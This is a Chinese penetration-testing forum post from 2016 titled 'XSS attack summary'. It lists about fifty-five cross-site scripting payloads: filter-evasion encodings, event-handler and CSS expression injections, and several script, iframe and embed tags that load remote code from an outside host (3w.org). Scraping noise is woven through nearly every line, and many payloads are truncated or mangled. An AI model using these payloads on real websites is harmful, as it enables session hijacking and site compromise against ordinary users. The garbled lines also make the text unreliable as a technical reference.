中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入& n2 M" T' T( n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, K" i- z2 \4 x, R(99)另类弹框
. D$ B- C7 d* m  d% `( u& |9 G8 D. c<q/oncut=alert()>1  {" R) q- c2 F7 q8 ]5 f
<s/onclick=alert()>b
& q+ @6 X" j6 b3 j  k2 k- Q <XSS=" onclick="alert(1)//">clickme</SSX=">) v$ z, A7 ]" S3 F, P
<zzz onclick=alert`1`>clickme</zzz>
% t9 U* ^4 E9 s4 P/ l <a onclick=alert`1`>clickme</a>
8 p6 F8 A# Y1 B<a=">clickme</a=">4 A# S; p& W. F3 I6 J
<a=">clickme</a>* j+ h$ o# n9 M
<z=">clickme</z=">
# v. [5 L# e) F7 ?<z onclick=alert`1`>clickme</z>- r6 d6 K( x$ _/ k; [
1 h# a+ _/ N# e8 \; E
(2)IMG标签XSS使用JavaScript命令+ Q8 Z5 m' V: X' d
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 j% q3 E  N+ ^, W' H$ i
! B& k- ]4 h" K4 h1 f
(3)IMG标签无分号无引号
, Z  C: U( _) ~7 Z1 B7 }<IMG SRC=javascript:alert(‘XSS’)>
- G* D& f! c/ {  N. t% L- w6 K) @; X3 F( m5 E: d
(4)IMG标签大小写不敏感
! [. a% c+ X) e; q6 b/ u  E6 f5 d<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* W' F* s, [& w) a8 J. f4 _# w5 [* p, }) T0 B$ z4 x" j8 @. D
(5)HTML编码(必须有分号)  \3 C$ P# [$ _
<IMG SRC=javascript:alert(“XSS”)>; w+ G2 Z7 J5 `% z
% _; Y& @5 ~7 b% [5 e4 s, K2 P
(6)修正缺陷IMG标签
; r0 g$ e, {5 i" J: K7 i<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 b. E2 s2 E2 J& V8 s
3 y+ W7 ~  y2 l
(7)formCharCode标签(计算器)1 l& u- ]0 t8 u' E0 w
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>  ~0 h8 ]/ K) M
9 D* U" z" b* ?8 H) `
(8)UTF-8的Unicode编码(计算器)
5 S( H) f8 J& F) U+ M<IMG SRC=jav..省略..S')>
: F4 n7 e# U$ h" v3 y% A
1 e4 d* i- A* k9 y4 \(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 K6 t3 |# J# G- c, i  S0 {/ F6 `<IMG SRC=jav..省略..S')>
; l. X. x8 N; t& X2 S, k$ n& g$ L
' z% n; s# f8 a+ |4 h* m3 U+ |(10)十六进制编码也是没有分号(计算器)! e" R' h' ~# |. [
<IMG SRC=\'#\'" /span>
! ]9 A4 P! d2 e% E
3 q3 u% w& w1 b& K6 Y# Y* j(11)嵌入式标签,将Javascript分开
) ]2 C" }+ K, w% ]/ _<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! V& m$ O+ E9 v# O: Q% ~

. c$ }$ `# t1 k) ?(12)嵌入式编码标签,将Javascript分开
# j& Z# E% Y4 L5 v<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
; T4 V1 `0 \' p, W$ ^' B& Q$ j3 l, b0 `  D+ v! t+ r9 c/ h1 y/ c4 p& B, E7 H+ h
(13)嵌入式换行符
5 F! X: x6 D) v<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 e% M. i9 N/ Q5 W( I! s- S. K
(14)嵌入式回车
. u" ?. J6 V3 f  |* \# Q<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>- _7 \" Y- ]! n$ x0 J
7 r4 i# N" \! |$ j/ U' X
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
/ I/ T- ^" D. }8 g& x<IMG SRC=\'#\'" /span>
* `. U( ~+ s& Q+ Z: M) E# m
1 M; R/ `4 D# y! [. D5 v4 f8 g2 S2 t(16)解决限制字符(要求同页面)
8 b# ~7 ~. e6 i$ K<script>z=’document.’</script>7 o& ~0 Q# n3 Z$ ?) l
<script>z=z+’write(“‘</script>6 u( u& Q9 A9 F/ C: V) A# ?+ E5 K' c
<script>z=z+’<script’</script>
+ Y7 `- m, t1 @<script>z=z+’ src=ht’</script># ?) a  y9 G9 M+ E8 d  d  T
<script>z=z+’tp://ww’</script>
( N# a! L: Y  S  g8 b<script>z=z+’w.shell’</script>
0 Q+ v3 B) D3 n  {" c( ^* R3 p- R<script>z=z+’.net/1.’</script>3 b7 }" y4 q# t7 ~# d& q, K
<script>z=z+’js></sc’</script>
9 `. ^% c3 _4 m% N: t# u" X5 F<script>z=z+’ript>”)’</script>5 A% S6 [4 L( d1 S2 Q
<script>eval_r(z)</script>& M* Y: ^- a( _$ O" W, Q- i  O
- k3 h( t; Q) _, |. Z! J+ I7 l; \' c2 @
(17)空字符" p( F' b6 t3 Y- c5 @& k
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- U' I& m5 o% Q1 ~. `) ]- Z; I. y1 J+ N: u% i! Z6 I- f! R, V# @8 ?& h) Q
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) y1 B- `( v! X6 h1 c5 y7 Y& s
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ j% N7 d3 _% j6 ?
! N! K; Z8 \; I6 {! Y
(19)Spaces和meta前的IMG标签
. j. u5 v! b# p# q3 i1 i- Y- @$ Q! }<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
# a) @, g* [5 |/ i
, L8 k% s) Z8 \, a8 {(20)Non-alpha-non-digit XSS( c: @# X  g" V+ W2 A( R
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>6 f3 i9 ^, _# d# I
+ D0 l1 p9 c/ G6 N# l& V# J) O
(21)Non-alpha-non-digit XSS to 2
/ o/ y7 F' d) F* t9 V+ y' N! q" J9 [<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. M6 i  ~. W3 P3 e' l: A+ t
) E; v* S7 Y  K(22)Non-alpha-non-digit XSS to 30 K5 R( T# Z0 _; u9 h( q( W8 T
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>9 x/ v3 d3 R' H) N, |* K* |' D
$ N) Z/ }  o, F" S$ W) u% u
(23)双开括号  L% q. o+ x6 k, X  j
<<SCRIPT>alert(“XSS”);//<</SCRIPT>$ z$ k! Z, l3 W  F# `2 U2 \7 l& A

. Y$ ~1 x  P5 F8 [(24)无结束脚本标记(仅火狐等浏览器)7 c2 K- k% u5 N5 P# q2 N4 c
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# O7 v# w! V0 F0 b& \5 W: p  q" p! Z3 ]# e* _0 E
(25)无结束脚本标记2
  c4 \# ~. L# j! d/ o4 ?! S<SCRIPT SRC=//3w.org/XSS/xss.js>
8 g5 b6 @8 Z/ K9 j0 y) {* k8 t. W& x* M3 y. e( o
(26)半开的HTML/JavaScript XSS' r3 h4 K1 T) `- E3 J" Q
<IMG SRC=\'#\'" /span>
/ K3 @! \# g4 P3 B2 B" |1 _7 \- Z& i4 @( z7 v2 D5 ~8 h3 M) \" o
(27)双开角括号
% x+ C& Y4 Y% \1 Y8 X<iframe src=http://3w.org/XSS.html <
, Q" Z! @2 X  X( _% U& q% n* X/ }1 h7 j- u# H" Z! H. v
(28)无单引号 双引号 分号
: p7 i9 \2 R! g  O% u3 ]1 p* _<SCRIPT>a=/XSS/
: {/ K( q- t+ N; m7 halert(a.source)</SCRIPT>
9 _) a5 e3 ?8 b: c& T" }8 H
2 x* `' v  ]0 B% C7 {3 M, D(29)换码过滤的JavaScript6 H1 O- O6 `- O7 J6 I5 l/ d, Q. x
\”;alert(‘XSS’);//
6 M0 H& w- W7 O
- H+ `8 E1 D; l/ e& X(30)结束Title标签5 Q, D, G4 D# e7 S- `
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( P( O7 e0 L) Q* V+ x8 e- v$ j4 o$ m$ [2 @
(31)Input Image
7 Z, h  d+ u2 b( a<INPUT SRC=\'#\'" /span>7 ?' Y' L# b" q* C1 b

$ F$ o0 }2 M  p! P+ ]) l0 `(32)BODY Image
5 _1 T; v; ^) x& ?8 c<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" c! G3 Y" F; O" H0 y" E+ Y! z+ d
(33)BODY标签) _0 k" X( ]% n4 ]0 O& s
<BODY(‘XSS’)>2 x. k- Y7 D2 T5 h
7 }7 t3 K6 E+ l7 P' Z6 ?
(34)IMG Dynsrc6 i9 h% i* q; X# o4 p2 k4 r' d7 M
<IMG DYNSRC=\'#\'" /span>
: J' q5 l1 G3 T5 C& |
5 k6 I1 V7 B2 \  X(35)IMG Lowsrc
# ~# ]3 b6 |( z: D: e<IMG LOWSRC=\'#\'" /span>6 D' `2 d: d5 ]! Q2 [! n

4 \$ a* c0 V. F) t# N% V+ @(36)BGSOUND2 u; }: _* a( l# N; {1 [. S
<BGSOUND SRC=\'#\'" /span>
8 ~" N; A& |" [7 @7 N2 p& F+ Z" o7 r/ `
(37)STYLE sheet
9 x/ m" d" s) ]# h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 M; O  i& ]+ P- m" \

8 J3 G/ q3 \, ?* D; }(38)远程样式表; P1 R) V" \$ q# d/ c
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. J: w) R$ v* V5 v6 x0 p2 z
: M/ f$ S0 D3 I8 n" q. S' h(39)List-style-image(列表式)
8 k0 ~- |, M2 l3 {/ K& n; T" B<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 e! W5 S, g% U+ P6 J5 Z/ d4 j" C" ]0 l( t6 ]) ^7 s  k
(40)IMG VBscript% X) A6 A" }, n  p& E4 z5 N
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS' n! @( N4 S- q* {4 i# u

- Q+ ^/ ^  N6 p0 W: u3 z(41)META链接url; e& o. B# G9 p5 M& M1 Q
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 r5 ^/ d$ e" U: j5 v

& r- T5 N' t0 W7 G) D9 p4 ?(42)Iframe
0 b# o* c( ]- S6 V  O0 D! K$ T<IFRAME SRC=\'#\'" /IFRAME>
* m3 ~4 M6 ]/ _9 j1 Z; g1 Q' i% @8 [6 V* A5 ^3 s9 r
(43)Frame
7 @* U+ B9 x/ P2 I2 J5 f/ |/ n<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
  {8 P/ f9 Z: K4 t. d) P! U6 i# w2 N5 s
(44)Table
8 {7 L$ S0 z1 s2 N<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>2 W  Q  g" T, ]9 R
( P* S6 L, y; }. J; _+ x  p
(45)TD
7 c0 k3 X$ n- r! n2 Y4 F- b<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% A3 W- M" h' Z& `9 [$ H  @$ G

# u9 `! A6 H4 G% r+ K( g+ }, N(46)DIV background-image& p6 _' A  p3 V; q1 {( {* P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! d2 T! p3 }) E5 ^7 O
9 E$ c5 I+ |6 V0 |
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
9 e: ~: J: \& L* S# [. N<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 O+ b1 ~  B7 K

8 m0 ?1 U! a& y2 v) ]8 J6 m(48)DIV expression
/ U& [# |+ H" ~) D4 }% K<DIV STYLE=”width: expression_r(alert(‘XSS’));”>, }6 L: d1 |& D8 \7 d
( C& Q6 t* H" P# i# H
(49)STYLE属性分拆表达  c3 K4 a- V! k5 z3 L0 V4 E; J
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>1 L( l: i6 ?0 i3 m9 `

) g" d$ k, M$ E, u1 T( _(50)匿名STYLE(组成:开角号和一个字母开头)
  X- j' i# F, N$ b/ g) X<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>- g  m( h% W: f; w6 V5 _

2 e3 t6 w" g  p- L8 S+ K(51)STYLE background-image! H: X* z% [( E: a3 @4 H2 r
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( @: F- G' d" X+ g, A8 \

+ X  h7 D( }% D" C+ d8 w: L. h5 ^& {(52)IMG STYLE方式9 u1 m% G- Q; |- s4 _2 h9 x, n6 C
exppression(alert(“XSS”))’>
; `( G- C6 x' J
3 f( V5 ?2 O' Q5 z' c. ]# p(53)STYLE background0 T$ k/ Q4 {8 A" Q7 Y
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>; `4 z& E& q% P' _

5 a$ K2 v/ @- c0 ]0 G! S' ?3 J(54)BASE
" ?8 C1 \4 i4 T<BASE HREF=”javascript:alert(‘XSS’);//”>/ B9 V4 p4 N! M7 n

: y5 `$ m! I9 K; \(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
$ z2 d( a/ o8 r0 \& X' k' a<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>5 G$ {1 I8 g: ?; {- h




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2